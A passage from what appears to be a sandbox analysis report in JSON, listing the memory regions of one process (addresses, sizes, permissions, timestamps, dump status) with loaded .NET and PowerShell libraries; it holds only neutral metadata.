"version": 1 }, "size": 65536, "start_va": 22740992, "type": "region", "version": 1 }, "end_va": 22806527, "entry_point": 0, "filename": null, "id": "region_555", "name": "private_0x00000000015b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 22740992, "timestamp": "00:00:22.313", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000556-addr_0x00000000015c0000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 22806528, "type": "region", "version": 1 }, "end_va": 22872063, "entry_point": 0, "filename": null, "id": "region_556", "name": "private_0x00000000015c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 22806528, "timestamp": "00:00:22.313", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000557-addr_0x0000000001610000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 23134208, "type": "region", "version": 1 }, "end_va": 23199743, "entry_point": 0, "filename": null, "id": "region_557", "name": "private_0x0000000001610000", "norm_filename": null, "region_type": "private_memory", "start_va": 23134208, "timestamp": "00:00:22.313", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000558-addr_0x0000000001620000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 23199744, "type": "region", "version": 1 }, "end_va": 23265279, "entry_point": 0, "filename": null, "id": "region_558", "name": "private_0x0000000001620000", "norm_filename": null, "region_type": "private_memory", "start_va": 23199744, "timestamp": "00:00:22.313", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000559-addr_0x0000000001c60000-size_0x0000000000010000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 29818879, "entry_point": 0, "filename": null, "id": "region_559", "name": "private_0x0000000001c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 29753344, "timestamp": "00:00:22.314", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000560-addr_0x0000000001cc0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30408703, "entry_point": 0, "filename": null, "id": "region_560", "name": "private_0x0000000001cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30146560, "timestamp": "00:00:22.314", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000561-addr_0x0000000001d00000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 30408704, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_561", "name": "private_0x0000000001d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 30408704, "timestamp": "00:00:22.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 64946175, "entry_point": 0, "filename": null, "id": "region_562", "name": "private_0x0000000001df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31391744, "timestamp": "00:00:22.315", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000563-addr_0x0000000003f40000-size_0x0000000000040000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 66322432, "type": "region", "version": 1 }, "end_va": 66584575, "entry_point": 0, "filename": null, "id": "region_563", "name": "private_0x0000000003f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 66322432, "timestamp": "00:00:22.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1654390784, "type": "region", "version": 1 }, "end_va": 1665892351, "entry_point": 1654390784, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_564", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1654390784, "timestamp": "00:00:22.315", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000565-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_565", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:22.323", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000566-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_566", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:22.323", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000567-addr_0x0000000001c20000-size_0x0000000000010000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_567", "name": "private_0x0000000001c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 29491200, "timestamp": "00:00:23.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 66584576, "type": "region", "version": 1 }, "end_va": 69607423, "entry_point": 66584576, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_568", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 66584576, "timestamp": "00:00:23.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1646395392, "type": "region", "version": 1 }, "end_va": 1654374399, "entry_point": 1646395392, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_569", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1646395392, "timestamp": "00:00:23.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1912864768, "type": "region", "version": 1 }, "end_va": 1913393151, "entry_point": 1912864768, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_570", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1912864768, "timestamp": "00:00:23.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1637482496, "type": "region", "version": 1 }, "end_va": 1646370815, "entry_point": 1637482496, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll", "id": "region_571", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1637482496, "timestamp": "00:00:23.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1955856384, "type": "region", "version": 1 }, "end_va": 1955893247, "entry_point": 1955861024, "filename": "\\Windows\\System32\\version.dll", "id": "region_572", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1955856384, "timestamp": "00:00:23.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1831010304, "type": "region", "version": 1 }, "end_va": 1834033151, "entry_point": 1833692190, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_573", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1831010304, "timestamp": "00:00:23.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 29569023, "entry_point": 29556736, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_575", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 29556736, "timestamp": "00:00:23.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 64946176, "type": "region", "version": 1 }, "end_va": 65732607, "entry_point": 64946176, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_576", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 64946176, "timestamp": "00:00:23.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2000617472, "type": "region", "version": 1 }, "end_va": 2000637951, "entry_point": 2000622648, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_577", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2000617472, "timestamp": "00:00:23.592", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000578-addr_0x0000000001c40000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 29626367, "entry_point": 0, "filename": null, "id": "region_578", "name": "private_0x0000000001c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 29622272, "timestamp": "00:00:23.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 29687808, "type": "region", "version": 1 }, "end_va": 29708287, "entry_point": 29687808, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_579", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 29687808, "timestamp": "00:00:23.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 29818880, "type": "region", "version": 1 }, "end_va": 30085119, "entry_point": 29818880, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_580", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 29818880, "timestamp": "00:00:23.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31096831, "entry_point": 31064064, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_583", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 31064064, "timestamp": "00:00:24.390", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 65732608, "type": "region", "version": 1 }, "end_va": 66007039, "entry_point": 65732608, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_584", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 65732608, "timestamp": "00:00:24.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 66060288, "type": "region", "version": 1 }, "end_va": 66064383, "entry_point": 0, "filename": null, "id": "region_585", "name": "pagefile_0x0000000003f00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 66060288, "timestamp": "00:00:24.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2314240, "start_va": 1635123200, "type": "region", "version": 1 }, "end_va": 1637437439, "entry_point": 1635123200, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll", "id": "region_586", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1635123200, "timestamp": "00:00:24.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739452476, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_587", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, "timestamp": "00:00:24.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1829765120, "type": "region", "version": 1 }, "end_va": 1830404095, "entry_point": 1829765120, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_588", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1829765120, "timestamp": "00:00:24.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1830420480, "type": "region", "version": 1 }, "end_va": 1830965247, "entry_point": 1830420480, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll", "id": "region_589", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1830420480, "timestamp": "00:00:24.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 307200, "start_va": 1859911680, "type": "region", "version": 1 }, "end_va": 1860218879, "entry_point": 1859911680, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_590", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 1859911680, "timestamp": "00:00:24.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1912471552, "type": "region", "version": 1 }, "end_va": 1912623103, "entry_point": 1912471552, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_591", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1912471552, "timestamp": "00:00:24.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 66125824, "type": "region", "version": 1 }, "end_va": 66129919, "entry_point": 0, "filename": null, "id": "region_592", "name": "pagefile_0x0000000003f10000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 66125824, "timestamp": "00:00:25.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1614020608, "type": "region", "version": 1 }, "end_va": 1614053375, "entry_point": 1614020608, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll", "id": "region_593", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 1614020608, "timestamp": "00:00:25.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 798720, "start_va": 1632567296, "type": "region", "version": 1 }, "end_va": 1633366015, "entry_point": 1632567296, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_594", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1632567296, "timestamp": "00:00:25.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1633419264, "type": "region", "version": 1 }, "end_va": 1635115007, "entry_point": 1633419264, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_595", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 1633419264, "timestamp": "00:00:25.319", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1828782080, "type": "region", "version": 1 }, "end_va": 1828966399, "entry_point": 1828782080, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll", "id": "region_596", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 1828782080, "timestamp": "00:00:25.327", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000597-addr_0x0000000003f10000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_79", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 66125824, "type": "region", "version": 1 }, "end_va": 66191359, "entry_point": 0, "filename": null, "id": "region_597", "name": "private_0x0000000003f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 66125824, "timestamp": "00:00:26.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 69664768, "type": "region", "version": 1 }, "end_va": 70008831, "entry_point": 69664768, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll", "id": "region_598", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 69664768, "timestamp": "00:00:26.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1130496, "start_va": 1624768512, "type": "region", "version": 1 }, "end_va": 1625899007, "entry_point": 1624768512, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll", "id": "region_599", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 1624768512, "timestamp": "00:00:26.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1064960, "start_va": 1625948160, "type": "region", "version": 1 }, "end_va": 1627013119, "entry_point": 1625948160, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll", "id": "region_600", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1625948160, "timestamp": "00:00:26.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5464064, "start_va": 1627062272, "type": "region", "version": 1 }, "end_va": 1632526335, "entry_point": 1627062272, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll", "id": "region_601", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 1627062272, "timestamp": "00:00:26.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1912733696, "type": "region", "version": 1 }, "end_va": 1912754175, "entry_point": 1912733696, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_602", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 1912733696, "timestamp": "00:00:26.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 66191360, "type": "region", "version": 1 }, "end_va": 66260991, "entry_point": 0, "filename": null, "id": "region_603", "name": "pagefile_0x0000000003f20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 66191360, "timestamp": "00:00:27.120", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000604-addr_0x00000000042d0000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_80", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70057984, "type": "region", "version": 1 }, "end_va": 70123519, "entry_point": 0, "filename": null, "id": "region_604", "name": 